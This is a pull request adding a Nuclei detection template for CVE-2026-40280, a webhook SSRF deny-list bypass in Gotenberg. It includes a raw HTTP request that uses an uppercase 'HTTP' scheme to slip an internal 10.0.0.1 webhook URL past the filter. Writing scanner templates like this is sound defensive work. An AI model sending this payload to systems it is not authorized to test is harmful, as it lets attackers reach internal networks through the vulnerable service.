### PR TITLE
Add CVE-2026-40280 template

### DIFF
--- a/http/cves/2026/CVE-2026-40280.yaml
+++ b/http/cves/2026/CVE-2026-40280.yaml
@@ -1,0 +1,37 @@
+id: cve-2026-40280-gotenberg-webhook-ssrf
+
+info:
+  name: Gotenberg Webhook SSRF Deny-List Scheme Bypass (CVE-2026-40280)
+  author: str4k3r
+  severity: critical
+  description: >
+    Gotenberg versions before 8.31.0 use a case-sensitive default private-IP
+    deny-list for webhook URLs. An uppercase HTTP scheme bypasses the regex
+    while net/url.Parse normalizes the scheme, so the unauthenticated conversion
+    endpoint accepts the webhook URL. Patched versions reject the same request.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-40280
+  classification:
+    cve-id: CVE-2026-40280
+  tags: cve,cve2026,gotenberg,ssrf,webhook
+
+http:
+  - raw:
+      - |-
+        POST /forms/chromium/convert/url HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=forge
+        Gotenberg-Webhook-Url: HTTP://10.0.0.1:12345/callback
+        Gotenberg-Webhook-Events-Url: http://example.com/events
+
+        --forge
+        Content-Disposition: form-data; name="url"
+
+        https://example.com/
+        --forge--
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 204


### PR DESCRIPTION
Adds the Nuclei template for CVE-2026-40280 based on the public advisory and its documented HTTP response differential for maintainer review.